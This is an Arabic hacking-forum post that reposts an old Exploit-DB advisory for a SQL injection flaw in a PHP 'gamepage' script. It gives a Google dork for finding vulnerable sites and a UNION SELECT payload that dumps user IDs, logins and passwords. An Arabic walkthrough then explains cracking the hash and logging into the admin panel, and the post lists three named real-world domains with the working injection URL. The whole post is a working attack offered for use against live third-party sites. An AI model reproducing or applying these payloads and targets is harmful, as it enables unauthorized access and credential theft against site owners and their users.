الثـغرهـ
كود:
# Title: PHP Gamepage SQL Injection Vulnerability
# EDB-ID: 12634
# CVE-ID: ()
# OSVDB-ID: ()
# Author: v4lc0m87
# Published: 2010-05-17
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
*************************************************************************
,
| ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . ,
| --- | | | | | |---' | | | |---' | | |
| `---' `---| `---' `---' ` `---' ` `---' `---`---
` `---'
*************************************************************************
[V] PHP Gamepage SQL Injection Vulnerability
--==[ Author ]==--
[+] Author : v4lc0m87
[+] Contact : valcom87[at]gmail[dot]com
[+] Group : INDONESIAN CYBER
[+] Site : http://indonesian-cyber.org/
[+] Date : May, 17-2010 [INDONESIA]
*************************************************************************
--==[ Details ]==--
[+] Vulnerable : SQL Injection
[+] Google Dork : inurl:index.php?title=gamepage
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Exploit:
[+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
[-] Remote SQLi p0c:
[+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG
[V] thx to:
SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk)
blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !! شرح الثغرهـ نسحب الدورك من اجريه :00001867[1]: ونرميه عند عمنا جوجل :a43: الدورك inurl:index.php?title=gamepage تيجيك مواقع قد شعر راسك .. نروح على موقع ونخلي الرابط هيكـ .. http://XXX.XX/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0 ,0,0,0,0,0,0+from+cw2_user-- يجينا الباس مشفر , روح فكه وانت تضحك smilies8 < تنساش تضحك :dd: وروح على مسار لوحة التحكم يلي هي .. http://XXX.XX/admin وسلامتك ما احلى بجامتك , تنسوناش بالإندكس مواقع محقونة .. كود PHP:
http://www.city-interactive.info/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
http://city-interactive.com.pl/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
http://www.city-interactive-games.biz/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
سلآلآم
FeyvmDZ> fjhvdo 17L5L2010 (fjhvdo hgd,l) SQL ++ l,hru lpr,km >> hgpr
05-17-2010, 10:30 PM
[ثغرة]~> بتاريخ 17/5/2010 (بتاريخ اليوم) SQL ++ مواقع محقونة .. الحق 
المواضيع المتشابهه 
العرض الشجري
